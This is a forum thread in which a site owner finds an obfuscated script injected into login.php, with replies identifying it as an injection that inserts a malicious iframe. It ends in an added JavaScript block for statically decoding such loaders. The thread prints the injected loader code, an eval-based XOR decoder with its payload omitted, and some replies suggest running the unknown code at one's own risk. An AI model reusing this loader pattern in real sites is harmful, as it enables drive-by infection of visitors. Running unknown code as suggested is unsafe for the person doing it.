Author | Message |
---|
Registered: 22.03.07 Logged in: 04.07.14 Posts: 344 Topics: 97 |
Hi. Apologies in advance if this doesn't belong in this section, but I really don't know where exactly to put it. When I opened the site I'm currently working on today, I found something like this in the file login.php:
Code:
<body><!-- ad --><script>window['e<v#a}l<'.replace(/[\}b\<#u]/g, '')](window['e<v#a}l<'.replace(/[\}b\<#u]/g, '')]('uDnDeTsTcTaTp4eT'.replace(/[N4,TD]/g, ''))('[percent-encoded string, cut off in the original post, omitted]
I'd like to know what this actually is. Whether some error occurred on the server side, or somebody hacked my site. And if it was a hack, could someone tell me something more about it? Please, could you clarify this for me? Thanks...
|
|
Registered: 26.11.06 Logged in: 22.01.24 Posts: 4118 Topics: 319 Location: HE/BA | Posted by Flety: 11.01.2009 14:45 | |
|
Judging by that comment, I'd say the hosting is free and they put ads on the pages, so it's an ad.
|
|
Registered: 22.03.07 Logged in: 04.07.14 Posts: 344 Topics: 97 | Posted by topic author newboy1: 11.01.2009 15:11 | |
|
No. It's actually not free hosting. It's proper paid hosting. So if they wanted to put something on my domain, they should contact me first and have my consent. At least I think they should... But I definitely don't have free hosting.
|
|
Registered: 26.11.06 Logged in: 22.01.24 Posts: 4118 Topics: 319 Location: HE/BA | Posted by Flety: 11.01.2009 15:18 | |
|
Try downloading the script and opening it from your own disk; if it's there, simply remove it; if not, then imho it's something for measuring traffic or something similar, probably nothing to be afraid of. Where do you actually have it hosted, with which company?
|
|
Registered: 27.07.07 Posts: 3948 Topics: 51 Location: Bratislava |
Some advice you gave him there, to run potentially malicious code straight from localhost...
If you didn't put it there yourself, delete it from there and change your FTP password right away...
Since the code isn't complete, try to "decode" it at http://scriptasylum.com/tutorials/encde ... ecode.html and you'll see what it does...
_________________ NTB: Acer Aspire 4820TG 14" | CPU: Intel Core i5 2,53 GHz | VGA: ATI Mobility Radeon HD5650 1GB | RAM: 8GB DDR3 1066 MHz | HDD: 1TB SSD WD BLUE |
|
Registered: 22.03.07 Logged in: 04.07.14 Posts: 344 Topics: 97 | Posted by topic author newboy1: 11.01.2009 17:05 | |
|
stenley... so it's a hack??
|
|
Registered: 27.07.07 Posts: 3948 Topics: 51 Location: Bratislava |
It's not your code, it's not code from the hosting, so it has no business being there... maybe you have some security hole on the site, I don't know... but to be safe, change all your access credentials as soon as possible...
|
Registered: 30.05.06 Logged in: 28.06.15 Posts: 2278 Topics: 45 Location: ZA |
At least post the whole code here...
|
|
Registered: 28.12.08 Logged in: 12.01.09 Posts: 78 Topics: 0 |
...basic rules (they don't always have to hold!):
1. foreign code that comes after the </html> tag is a server misconfiguration or a virus on your computer....
2. foreign code inside the code is an injection
=>...your code is located after <body>, so it's an injection...=> you have a vulnerable script...
|
|
Registered: 22.03.07 Logged in: 04.07.14 Posts: 344 Topics: 97 | Posted by topic author newboy1: 12.01.2009 15:06 | |
|
Well, it's true that the script isn't sanitized yet, because I'm still working on the site and haven't done the sanitizing yet.
Here is the whole code:
Code:
<style type="text/css"> * {margin:0; padding:0; } html, body { height:100%; background-color: #333333} body { min-width: 800px; text-align: center;} body>#container { height: auto; border-width: 1px 3px 1px 3px; border-style: solid; border-color: #222222;} </style> </head>
<body><!-- ad --><script>window['eTvma^lT'.replace(/[mP\^TC]/g, '')](window['eTvma^lT'.replace(/[mP\^TC]/g, '')]('uVnFeVs&cVa^pFe^'.replace(/[\{&FV\^]/g, ''))('[percent-encoded string omitted]'));</script><!-- /ad --> <div id="container"> <div id="head">Hlavička</div>
And here is what that crypter at http://scriptasylum.com/tutorials/encdec/encode-decode.html decoded it to:
Code:
<body><!-- ad --><script>window['eTvma^lT'.replace(/[mP\^TC]/g, '')](window['eTvma^lT'.replace(/[mP\^TC]/g, '')]('uVnFeVs&cVa^pFe^'.replace(/[\{&FV\^]/g, ''))('function ALpap(LIaGD){function AADlIa(AAH){eval("var AAAa=0;");var PDLH=AAH.length;eval("var LATII=0;");while(LATII<PDLH){AAAa+=ATDA(AAH,LATII)*PDLH;LATII++;}return (AAAa+'');}function ATDA(HplILT,AApa){return HplILT.charCodeAt(AApa);} try {var AapPA=eval('aqr@g!uqm[e[n!t[s!.[c(a!l(l(e!e!'.replace(/[\[q\!\(@]/g, '')),PapDTT='';var HlT=0,LhLD=0,AhDGAG=(new String(AapPA)).replace(/[^@a-z0-9A-Z_.,-]/g,'');var HDhhpD=AADlIa(AhDGAG);eval("LIaGD=unescape(LIaGD);");for(var HalP=0; HalP < (LIaGD.length); HalP++){var PIhaIP=ATDA(AhDGAG,HlT)^ATDA(HDhhpD,LhLD);var PIApAT=ATDA(LIaGD,HalP);HlT++;LhLD++;if(LhLD>HDhhpD.length)LhLD=0;if(HlT>AhDGAG.length)HlT=0;PapDTT+=String.fromCharCode(PIApAT^PIhaIP) + '';}eval(PapDTT); return PapDTT=null;}catch(e){}}ALpap('[percent-encoded payload omitted]');'));</script><!-- /ad -->
But I have absolutely no idea what it is. Well, I do know that tomorrow I'll get straight to sanitizing the scripts.
|
|
Registered: 28.12.08 Logged in: 12.01.09 Posts: 78 Topics: 0 |
...it's still encoded....either you decode it in a virtual machine, or simpler is to run it, but at your own risk...
btw there can't be an injection directly in a pure HTML file, only a few specific kinds, but those mostly don't run from your server...if you don't have any PHP file, then the fault is in the server's security...
|
|
Registered: 13.11.07 Logged in: 20.08.16 Posts: 1702 Topics: 0 | Posted by chrono: 12.01.2009 16:45 | |
|
Basically it inserts an iframe into the page (Firefox, however, recognizes that the page being inserted via the iframe is malicious, so it blocks it).
|
|
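The decoded loader quoted in the thread derives its XOR key from its own source text (`arguments.callee`), so editing the loader changes the key. The helpers below are an added example, not code from the thread: they mirror the loader's decoding steps as plain string operations without calling `eval()`, and `LOADER_SRC`, `DEFANGED_SRC`, `PLAIN` and `SAMPLE` are constructed stand-ins, not the thread's payload.

```javascript
// Added example: static decoding helpers. Nothing here calls eval().

// Name hiding: resolve every 'junk'.replace(/[chars]/g, '') found in a script.
function resolveHiddenNames(script) {
  const pat = /'([^']*)'\.replace\(\/(\[(?:\\.|[^\]\\])*\])\/g,\s*''\)/g;
  return [...script.matchAll(pat)].map(m => m[1].replace(new RegExp(m[2], 'g'), ''));
}

// Key: the loader's own source text, reduced to the characters [@a-zA-Z0-9_.,-].
function keyFromSource(fnSource) {
  return fnSource.replace(/[^@a-z0-9A-Z_.,-]/g, '');
}

// Second key stream: sum(charCode * key.length), rendered as a decimal string.
function checksum(key) {
  let sum = 0;
  for (let i = 0; i < key.length; i++) sum += key.charCodeAt(i) * key.length;
  return String(sum);
}

// XOR layer, mirroring the loader's loop including its ">" wrap-around test:
// an index equal to the length makes charCodeAt return NaN, which XORs as 0.
function xorLayer(data, fnSource) {
  const key = keyFromSource(fnSource), sum = checksum(key);
  let k = 0, s = 0, out = '';
  for (let i = 0; i < data.length; i++) {
    const mask = key.charCodeAt(k) ^ sum.charCodeAt(s);
    k++; s++;
    if (s > sum.length) s = 0;
    if (k > key.length) k = 0;
    out += String.fromCharCode(data.charCodeAt(i) ^ mask);
  }
  return out;
}

// Wrapper text as posted in the thread; everything below it is constructed.
const WRAPPER = String.raw`window['eTvma^lT'.replace(/[mP\^TC]/g, '')](window['eTvma^lT'.replace(/[mP\^TC]/g, '')]('uVnFeVs&cVa^pFe^'.replace(/[\{&FV\^]/g, ''))(`;
const LOADER_SRC = 'function demo(p){ eval(p); }';        // constructed stand-in
const DEFANGED_SRC = LOADER_SRC.replace('eval', 'alert'); // an analyst's edit
const PLAIN = 'document.title = "constructed sample";';   // harmless sample text
const SAMPLE = xorLayer(PLAIN, LOADER_SRC);               // XOR is symmetric

console.log(resolveHiddenNames(WRAPPER));                 // hidden names, as strings
console.log(xorLayer(SAMPLE, LOADER_SRC) === PLAIN);      // verbatim source decodes
console.log(xorLayer(SAMPLE, DEFANGED_SRC) === PLAIN);    // edited source does not
```

The percent-encoded layers are plain data and can be undone with `unescape()` on the string before `xorLayer` is applied; the loader source passed in must be the unmodified text, treated as a string and never executed.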